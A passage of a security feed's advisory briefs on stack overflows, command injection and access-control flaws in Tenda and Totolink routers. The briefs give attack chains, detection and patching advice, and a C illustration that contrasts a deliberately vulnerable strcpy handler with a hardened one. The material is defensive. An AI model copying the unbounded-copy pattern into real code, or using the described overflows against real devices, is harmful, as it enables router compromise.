Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-cx12l-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5604"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5604","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5604 details a critical security vulnerability affecting Tenda CH22 router version 1.0.0.1. The vulnerability is a stack-based buffer overflow located in the \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function within the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e file, which handles parameters. Attackers can exploit this flaw by manipulating the \u003ccode\u003estandard\u003c/code\u003e argument. The vulnerability can be triggered remotely, meaning an attacker does not need local access to the device. Given that a public exploit is available, this vulnerability poses a significant risk to users of the affected Tenda CH22 router. 
This allows unauthenticated attackers to potentially gain full control of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a Tenda CH22 router version 1.0.0.1 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker includes an overly long string as the value for the \u003ccode\u003estandard\u003c/code\u003e parameter in the HTTP request.\u003c/li\u003e\n\u003cli\u003eThe Tenda CH22 router receives the malicious request and passes the \u003ccode\u003estandard\u003c/code\u003e parameter to the \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function copies the oversized \u003ccode\u003estandard\u003c/code\u003e argument into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis causes a stack-based buffer overflow, overwriting adjacent memory regions, including the return address of the function.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address to point to attacker-controlled code injected into memory, or to a Return-Oriented Programming (ROP) chain.\u003c/li\u003e\n\u003cli\u003eUpon function return, execution is redirected to the attacker\u0026rsquo;s code, allowing them to execute arbitrary commands on the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5604 allows a remote, unauthenticated attacker to execute arbitrary code on the Tenda CH22 router. This could lead to a complete compromise of the device, allowing the attacker to gain control over network traffic, modify router settings, or use the device as part of a botnet. 
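\u003c/p\u003e\n\u003cp\u003eThe following C program is an added illustration, not Tenda firmware code. It models the handler shape the attack chain above describes (a request field such as \u003ccode\u003estandard\u003c/code\u003e copied with \u003ccode\u003estrcpy\u003c/code\u003e into a fixed stack buffer) beside a bounded version, and shows why a bare \u003ccode\u003estrncpy\u003c/code\u003e is an incomplete fix. \u003ccode\u003eFIELD_MAX\u003c/code\u003e, the function names and the sample values are assumptions; the brief does not give the real buffer size in \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e.\u003c/p\u003e\n

```c
/*
 * Added example, not Tenda code: the handler shape behind the stack
 * overflows in these briefs (a request field copied with strcpy() into a
 * fixed stack buffer), a hardened version, and a common incomplete fix.
 * FIELD_MAX and the function names are assumptions; the brief does not
 * give the real buffer size used by formCertLocalPrecreate.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 64   /* assumed size of the stack buffer */

/* Vulnerable shape (CWE-121). strcpy() stops only at the NUL terminator, so
 * an input of FIELD_MAX bytes or more writes past buf into the saved
 * registers and return address, as the attack chain describes.
 * This file only ever calls it with a short, constructed value. */
int handler_vulnerable(const char *standard)
{
    char buf[FIELD_MAX];
    strcpy(buf, standard);            /* no length check */
    return (int)strlen(buf);
}

/* True when handler_vulnerable() would write past buf for this input
 * (the value plus its NUL terminator must fit in FIELD_MAX bytes). */
bool would_overflow(const char *standard)
{
    return strlen(standard) >= FIELD_MAX;
}

/* Incomplete fix: strncpy() bounds the write, but when the input fills the
 * buffer it leaves no NUL terminator, so later strlen()/printf() calls read
 * past buf. Returns true if buf ended up terminated. */
bool strncpy_fix_terminates(const char *standard)
{
    char buf[FIELD_MAX];
    memset(buf, 'X', sizeof buf);     /* poison so a missing NUL is visible */
    strncpy(buf, standard, sizeof buf);
    return memchr(buf, '\0', sizeof buf) != NULL;
}

/* Hardened shape: validate the length before copying, reject (HTTP 400 in
 * a real server) when it does not fit, and copy with an explicit bound that
 * always leaves a terminator. out must have room for FIELD_MAX bytes. */
int handler_hardened(const char *standard, char *out)
{
    size_t n = strlen(standard);
    if (n >= FIELD_MAX) {
        out[0] = '\0';
        return -1;                    /* rejected: too long */
    }
    memcpy(out, standard, n + 1);     /* n + 1 <= FIELD_MAX, includes NUL */
    return 0;
}

int main(void)
{
    char big[200];                    /* constructed oversized 'standard' value */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    char out[FIELD_MAX];

    printf("short value   : overflow=%d hardened=%d terminated=%d\n",
           would_overflow("x509"), handler_hardened("x509", out),
           strncpy_fix_terminates("x509"));
    printf("199-byte value: overflow=%d hardened=%d terminated=%d\n",
           would_overflow(big), handler_hardened(big, out),
           strncpy_fix_terminates(big));
    return 0;
}
```

\u003cp\u003eThe 199-byte value is rejected by \u003ccode\u003ehandler_hardened\u003c/code\u003e and leaves the \u003ccode\u003estrncpy\u003c/code\u003e buffer unterminated; \u003ccode\u003ehandler_vulnerable\u003c/code\u003e is never given it, because that write is undefined behaviour and is exactly the step the attack chain turns into a return-address overwrite. In the embedded httpd binaries these briefs concern, the length check belongs at the point where the server hands the decoded field to the handler.\u003c/p\u003e\n\u003cp\u003e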
Given the wide deployment of Tenda routers, a large number of devices could be vulnerable, making this a high-impact vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor HTTP traffic for POST requests to \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e with unusually long \u003ccode\u003estandard\u003c/code\u003e parameters to identify potential exploit attempts (see rule: \u0026ldquo;Detect Tenda CH22 Buffer Overflow Attempt via Long Standard Parameter\u0026rdquo;). The router\u0026rsquo;s own web server does not forward logs, and ordinary access logs do not record POST bodies, so the rule needs a proxy, IDS or packet capture in front of the management interface as its log source.\u003c/li\u003e\n\u003cli\u003eRate limiting on the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e endpoint only slows an attacker who needs many attempts (for example when guessing addresses for an unreliable exploit); a single crafted request is enough to trigger the overflow, so treat it as a secondary control behind restricting who can reach the web interface.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-5604.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda CH22 Router POST Request to CertLocalPrecreate\u0026rdquo; to identify suspicious POST requests to the affected endpoint and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T23:16:20Z","date_published":"2026-04-05T23:16:20Z","id":"/briefs/2026-04-tenda-ch22-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5604) in Tenda CH22 1.0.0.1 allows remote attackers to execute arbitrary code by manipulating the 'standard' argument in the formCertLocalPrecreate function of the /goform/CertLocalPrecreate file within the Parameter Handler component.","title":"Tenda CH22 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ch22-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5567"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5567","buffer-overflow","tenda","router","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability has 
been identified in Tenda M3 router version 1.0.0.10. The vulnerability resides in the \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function within the \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e file, a part of the Destination Handler component. By manipulating the \u003ccode\u003epolicyType\u003c/code\u003e argument, a remote attacker can trigger a buffer overflow, potentially leading to arbitrary code execution. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations utilizing the affected Tenda M3 router, potentially allowing attackers to gain unauthorized access to the network or disrupt services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda M3 router exposed to the internet or reachable from their network position.\u003c/li\u003e\n\u003cli\u003eAttacker sends a crafted HTTP POST request to \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a malicious \u003ccode\u003epolicyType\u003c/code\u003e argument designed to overflow the buffer in the \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function in \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e processes the \u003ccode\u003epolicyType\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe excessive data provided in the \u003ccode\u003epolicyType\u003c/code\u003e argument overwrites adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite critical data or inject malicious code into the process\u0026rsquo;s memory space.\u003c/li\u003e\n\u003cli\u003eThe injected code is executed, giving the attacker control over the 
router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router as a foothold to pivot to other devices on the network, exfiltrate sensitive data, or cause denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the Tenda M3 router. This could lead to a complete compromise of the device, allowing the attacker to control network traffic, access sensitive information, or use the router as a launchpad for further attacks within the network. Given the severity and the existence of public exploits, vulnerable routers are at high risk of being targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-5567.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e with unusually long \u003ccode\u003epolicyType\u003c/code\u003e arguments; deploy the Sigma rule \u003ccode\u003eDetect Suspicious PolicyType Argument Length\u003c/code\u003e to identify this activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eConsider using a web application firewall (WAF) to filter malicious requests targeting the affected endpoint.\u003c/li\u003e\n\u003cli\u003eReview and restrict access to the router\u0026rsquo;s management interface to authorized personnel only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T13:17:14Z","date_published":"2026-04-05T13:17:14Z","id":"/briefs/2026-04-tenda-m3-overflow/","summary":"A buffer overflow vulnerability exists in Tenda M3 1.0.0.10 via manipulation of the policyType argument in the setAdvPolicyData function, allowing remote 
attackers to execute arbitrary code.","title":"Tenda M3 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-m3-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5550"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5550","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5550, exists in Tenda AC10 router firmware version 16.03.10.10_multi_TDE01. The vulnerability is located in the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function within the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary. A remote attacker can exploit this flaw to overwrite the stack and potentially execute arbitrary code on the affected device. This is achieved by sending a specially crafted request to the device. Successful exploitation could lead to complete system compromise, allowing attackers to gain unauthorized access, control the device, or use it as a foothold for further network intrusion. 
Given the widespread use of Tenda routers, this vulnerability poses a significant risk to home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda AC10 router running firmware version 16.03.10.10_multi_TDE01.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a malicious HTTP request to the router\u0026rsquo;s web management interface, which is served by the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary (\u003ccode\u003e/bin/httpd\u003c/code\u003e is the server executable rather than a URL path; the brief does not name the specific route that reaches \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe malicious request is designed to overflow the buffer in the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function when processing the request parameters.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites the stack with attacker-controlled data, including the return address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e process attempts to return from the \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the overwritten return address, execution is redirected to the attacker\u0026rsquo;s code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process, which on consumer routers of this kind commonly runs as root.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the device and can perform arbitrary actions, such as modifying router settings, executing commands, or establishing a backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5550 allows a remote attacker to gain complete control of the affected Tenda AC10 router. This can lead to data breaches, denial-of-service attacks, or the router being used as part of a botnet. Given the potential for widespread exploitation and the ease with which the vulnerability can be triggered, CVE-2026-5550 poses a high risk to users of the affected Tenda AC10 router model. 
The attacker could potentially monitor all network traffic passing through the device, steal sensitive information, or use the compromised device to launch attacks against other systems on the network or the internet.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor HTTP traffic to the router\u0026rsquo;s web management interface (served by the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary; there is no \u003ccode\u003e/bin/httpd\u003c/code\u003e URL to watch for) for POST requests with abnormally large parameter values that could indicate a buffer overflow attempt against \u003ccode\u003efromSysToolChangePwd\u003c/code\u003e (see the related Sigma rule below). Because the router does not forward access logs and access logs do not carry POST bodies, the rule needs a proxy, IDS or packet capture in front of the interface as its log source.\u003c/li\u003e\n\u003cli\u003eSince a patch is not mentioned, consider replacing the affected Tenda AC10 device or isolating it from critical network segments if immediate replacement is not feasible.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T08:16:25Z","date_published":"2026-04-05T08:16:25Z","id":"/briefs/2026-04-tenda-ac10-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5550) in Tenda AC10 firmware version 16.03.10.10_multi_TDE01 within the /bin/httpd SysToolChangePwd function allows remote attackers to execute arbitrary code.","title":"Tenda AC10 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ac10-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5526"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-5526","tenda","router","access-control"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA security vulnerability, identified as CVE-2026-5526, affects the Tenda 4G03 Pro router, specifically versions up to 1.0/1.1/04.03.01.53/192.168.0.1. 
The flaw resides within an unspecified function of the \u003ccode\u003e/bin/httpd\u003c/code\u003e web server binary and results in improper access control. A remote attacker could exploit this vulnerability, potentially gaining unauthorized access to the device. Publicly available exploits exist, increasing the risk of exploitation. This issue was reported on April 4, 2026, and poses a significant threat due to the ease of remote exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda 4G03 Pro router with a publicly accessible web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the router\u0026rsquo;s web management interface, which is served by the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary (the brief does not identify the specific route or function).\u003c/li\u003e\n\u003cli\u003eThe malicious request exploits the improper access control vulnerability (CVE-2026-5526).\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003e/bin/httpd\u003c/code\u003e process improperly handles the request, bypassing access controls.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive functionalities of the router.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies router configurations, such as DNS settings or firewall rules.\u003c/li\u003e\n\u003cli\u003eThe attacker could potentially use the compromised router as a pivot point for further network attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5526 could allow attackers to remotely compromise Tenda 4G03 Pro routers. This can lead to unauthorized access to the device\u0026rsquo;s configuration, modification of settings, or use of the router as a stepping stone for further attacks within the network. Given the availability of public exploits, unpatched devices are at significant risk. 
While the exact number of affected devices is unknown, the widespread use of Tenda routers makes this a potentially significant issue.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor HTTP traffic to the router\u0026rsquo;s web management interface (served by the \u003ccode\u003e/bin/httpd\u003c/code\u003e binary, which is not itself a URL path) for unauthenticated requests that reach administrative functions, using the provided Sigma rule; the router does not forward access logs, so a proxy, IDS or packet capture in front of the interface is the practical log source.\u003c/li\u003e\n\u003cli\u003eApply available firmware updates or patches from Tenda to address CVE-2026-5526 as soon as they are released.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eEnforce strong administrator passwords; this limits credential attacks but does not by itself mitigate an access control bypass, so restricting reachability of the web interface is the primary control until a fix is available.\u003c/li\u003e\n\u003cli\u003eReview and update firewall rules to restrict access to the router\u0026rsquo;s web interface from untrusted networks.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process execution originating from the web server process.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T23:16:44Z","date_published":"2026-04-04T23:16:44Z","id":"/briefs/2026-04-tenda-4g03-pro-access-control/","summary":"CVE-2026-5526 describes an improper access control vulnerability in the Tenda 4G03 Pro router's /bin/httpd file, allowing remote attackers to potentially gain unauthorized access.","title":"Tenda 4G03 Pro Improper Access Control Vulnerability (CVE-2026-5526)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-4g03-pro-access-control/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5204"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5204","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5204 describes a critical stack-based buffer overflow vulnerability affecting Tenda CH22 router version 1.0.0.1. 
The vulnerability resides within the \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function in the \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e file, which handles web-based parameter input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the router, manipulating the \u003ccode\u003ewebSiteId\u003c/code\u003e argument to overwrite the stack buffer. This allows for arbitrary code execution on the device. Given the router\u0026rsquo;s role as a network gateway, successful exploitation can lead to complete compromise of the device and potentially the entire network behind it. The availability of a public exploit increases the risk of widespread exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda CH22 router running firmware version 1.0.0.1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003ewebSiteId\u003c/code\u003e parameter with a payload exceeding the expected buffer size, triggering the stack-based buffer overflow in the \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe overwritten return address is replaced with the address of malicious code injected into the payload or a pre-existing code location within the router\u0026rsquo;s firmware (Return-Oriented Programming - ROP).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformWebTypeLibrary\u003c/code\u003e function returns, transferring control to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes, granting the attacker control over the 
device.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this control to further compromise the network or disrupt services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5204 allows a remote attacker to execute arbitrary code on the vulnerable Tenda CH22 router. This can lead to complete control of the device, enabling the attacker to intercept network traffic, modify DNS settings, create VPNs, or launch further attacks on devices within the network. Given that routers are essential network devices, a successful attack can have a significant impact, affecting all connected devices and potentially exposing sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates for Tenda CH22 routers immediately to patch CVE-2026-5204.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eTenda-CH22-WebSiteId-Buffer-Overflow\u003c/code\u003e to detect exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/webtypelibrary\u003c/code\u003e with unusually long \u003ccode\u003ewebSiteId\u003c/code\u003e parameters, as indicated by \u003ccode\u003eWebSiteId_Length_Detection\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a potential router compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T16:16:35Z","date_published":"2026-03-31T16:16:35Z","id":"/briefs/2026-03-tenda-ch22-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5204) exists in the Tenda CH22 1.0.0.1 router, allowing remote attackers to execute arbitrary code by manipulating the webSiteId argument in the formWebTypeLibrary function.","title":"Tenda CH22 Stack-Based Buffer Overflow Vulnerability 
(CVE-2026-5204)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5176"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","cve-2026-5176","totolink","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-5176, has been discovered in Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024. The vulnerability resides within the \u003ccode\u003esetSyslogCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. An unauthenticated, remote attacker can exploit this flaw by manipulating arguments passed to the vulnerable function. This manipulation results in the execution of arbitrary commands on the affected device. Given the public…\u003c/p\u003e\n","date_modified":"2026-03-31T02:15:59Z","date_published":"2026-03-31T02:15:59Z","id":"/briefs/2026-03-totolink-cve-2026-5176/","summary":"A command injection vulnerability (CVE-2026-5176) exists in the setSyslogCfg function of the Totolink A3300R router version 17.0.0cu.557_b20221024, allowing remote attackers to execute arbitrary commands by manipulating arguments in the /cgi-bin/cstecgi.cgi file.","title":"Totolink A3300R Command Injection Vulnerability (CVE-2026-5176)","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-cve-2026-5176/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5156"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5156","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda CH22 router version 1.0.0.1. 
The vulnerability resides within the \u003ccode\u003eformQuickIndex\u003c/code\u003e function of the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e file, which is a component of the Parameter Handler. This flaw can be triggered by manipulating the \u003ccode\u003emit_linktype\u003c/code\u003e argument, leading to a buffer overflow on the stack. The vulnerability is remotely exploitable, meaning an attacker can trigger the flaw over the network without needing local access to the device. The existence of a public exploit further increases the risk of potential exploitation by malicious actors. Successful exploitation could allow an attacker to execute arbitrary code on the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Tenda CH22 router running firmware version 1.0.0.1 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes the \u003ccode\u003emit_linktype\u003c/code\u003e argument with a payload exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe Tenda CH22 router processes the HTTP request and passes the \u003ccode\u003emit_linktype\u003c/code\u003e argument to the \u003ccode\u003eformQuickIndex\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformQuickIndex\u003c/code\u003e function copies the attacker-controlled \u003ccode\u003emit_linktype\u003c/code\u003e data into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eDue to the oversized payload, the copy operation overflows the buffer, overwriting adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformQuickIndex\u003c/code\u003e function completes and attempts to return to 
the caller function.\u003c/li\u003e\n\u003cli\u003eDue to the overwritten return address, control is redirected to attacker-controlled code, enabling arbitrary code execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary code on the Tenda CH22 router. This can lead to a variety of malicious outcomes, including complete device compromise, denial of service, and the potential to use the router as a launchpad for further attacks on the local network or the internet. Given that routers are often used in both home and small business environments, a successful attack could affect a wide range of users and organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e with unusually long \u003ccode\u003emit_linktype\u003c/code\u003e parameters to detect potential exploitation attempts. 
Implement the Sigma rule \u003ccode\u003eDetect Tenda CH22 mit_linktype Buffer Overflow Attempt\u003c/code\u003e against web server logs.\u003c/li\u003e\n\u003cli\u003eRate limiting on the \u003ccode\u003e/goform/QuickIndex\u003c/code\u003e endpoint can slow repeated attempts, but one crafted request is enough to crash \u003ccode\u003ehttpd\u003c/code\u003e or gain code execution, so it does not prevent a denial of service on its own; restricting which hosts can reach the web interface is the primary control until a fix is available.\u003c/li\u003e\n\u003cli\u003eThe source material classifies the flaw as CWE-119 (improper restriction of operations within the bounds of a memory buffer) and CWE-121 (stack-based buffer overflow). The fix belongs in the vendor firmware, namely a length check on \u003ccode\u003emit_linktype\u003c/code\u003e before it is copied and a bounded copy; apply a Tenda firmware update that addresses the issue as soon as one is released.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T00:16:15Z","date_published":"2026-03-31T00:16:15Z","id":"/briefs/2026-03-tenda-ch22-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda CH22 1.0.0.1 via manipulation of the `mit_linktype` argument in the `/goform/QuickIndex` endpoint, potentially enabling remote code execution.","title":"Tenda CH22 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5154"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5154","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5154, has been discovered in Tenda CH22 firmware version 1.0.0.1/1.If. The vulnerability resides within the \u003ccode\u003efromSetCfm\u003c/code\u003e function in the \u003ccode\u003e/goform/setcfm\u003c/code\u003e file, a component of the Parameter Handler. Successful exploitation allows remote attackers to execute arbitrary code on the device. Publicly available exploits exist, increasing the risk of widespread exploitation. 
